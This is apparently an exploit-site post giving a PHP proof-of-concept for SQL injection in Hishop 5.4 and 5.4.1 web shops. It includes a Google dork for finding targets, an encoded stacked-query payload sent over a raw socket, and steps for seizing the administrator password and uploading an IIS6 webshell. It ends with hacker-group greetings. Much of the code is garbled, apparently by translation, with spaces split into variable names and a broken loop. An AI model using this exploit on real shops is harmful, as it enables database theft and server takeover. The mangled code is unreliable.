# Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Vendor orSoftware Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html]
# Version: [ 5.4 & 5.4.1 ]
# Category:: [ webapps]
# Google dork: [intext:Hishop 5.4]
# Tested on: [Windows 7 ]
##################################################
[~] P0c [~] :
Php
print_r ('
+ ------------------------- +
Hishop 5.4 & 5.4.1 SQL injection the exploit By: Hacker-Fire
+ ------------------------- +
');
if($ argc <3) {
print_r ('
+ ------------------------- +
Usage: php '. $ Argv [0].'Host Port Path RegMail
Example:
php '. $ argv [0].'localhost 80 / SHOES/category-92.aspx? valueStr = 35_0 syc@myclover.org
+ ------------------------- +
');
exit;
}
$ Host = $ argv [1];
$ Port = $ argv [2];
$ Path = $ argv [3];
$ Mail = $ argv [4];
$ Expdata = "";
for($ i = 0; $ i $ Expdata = $ expdata. Dechex(ord ($ mail [$ i])). "00"; $ Expdata = strtoupper($ expdata); $ Expdata = "% 27)% 20or% 201 = 1; DECLARE% 20 @ S% 20NVARCHAR (4000)% 20SET% 20 @ S = CAST (". $ Expdata. "2700% 20AS% 20NVARCHAR (4000))% 20EXEC (S); - "; GET ($ host, $ port, $ path, $ expdata, 30); functionGET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ") { $ Fp = fsockopen($ host, $ port, $ errno, $ errstr, 30); if(! $ fp) { echo"{$ the errstr} ({$ errno is}) exit; } $ ut = "GET $ path $ data HTTP/1.1 \ r \ n"; $ Out. = "The Host: $ host: $ port \ r \ n"; $ Out. = "The Connection: CLOSE \ r \ n \ r \ n \ r \ n"; fwrite ($ fp, $ out); while(! feof($ fp)) { fgets($ fp, 128); } fclose ($ fp); } print_r (' + ------------------------- + [+] Get Manager, the Password [1] to [landing] - "[My Account] -"[personal information】 [2] E-mail the administrator password. [3] the Good Luck! + ------------------------- + [+] Get the WebShell (the IIS6) Log in from [1] / admin / [commodity management] - "[Category template set】 [2] the upload 1.asp;. Html [3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html + ------------------------- + '); ?> ########################################################## [»] Greetz to : [ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ] [ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ] [ And all my Freinds + Algerian Hackers ] ########################################################## # 1337day.com [2012-04-06]
\ n";